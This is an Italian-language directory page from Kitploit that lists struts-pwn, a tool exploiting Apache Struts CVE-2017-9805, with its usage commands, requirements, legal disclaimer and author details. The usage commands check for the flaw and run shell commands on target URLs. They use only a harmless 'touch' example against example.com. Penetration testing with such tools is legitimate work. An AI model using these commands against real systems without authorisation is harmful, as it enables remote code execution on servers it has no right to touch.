Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/mazen160/struts-pwn_cve-2017-9805
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubmazen160/struts-pwn_cve-2017-9805

struts-pwn_CVE-2017-9805

Un exploit per Apache Struts CVE-2017-9805

Vedi Repository
2476758 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

struts-pwn - Exploit CVE-2017-9805

Un exploit per Apache Struts CVE-2017-9805

Utilizzo

Verifica se la vulnerabilità esiste su un singolo URL.

python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'

Verifica se la vulnerabilità esiste su un elenco di URL.

python struts-pwn.py --list 'urls.txt'

Sfrutta un singolo URL.

python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'

Sfrutta un elenco di URL.

python struts-pwn.py --exploit --list 'urls.txt' -c 'touch /tmp/struts-pwn'

Demo

Demo

Requisiti

  • Python2 o Python3
  • requests

Disclaimer legale

Questo progetto è realizzato esclusivamente per scopi educativi e di test etici. L'utilizzo di struts-pwn per attaccare obiettivi senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non rispondono di eventuali usi impropri o danni causati da questo programma.

Licenza

Il progetto è concesso in licenza secondo i termini della MIT License.

Autore

Mazin Ahmed

  • Sito web: https://mazinahmed.net
  • Email: mazin AT mazinahmed DOT net
  • Twitter: https://twitter.com/mazen160
  • Linkedin: http://linkedin.com/in/infosecmazinahmed
Scarica lo strumento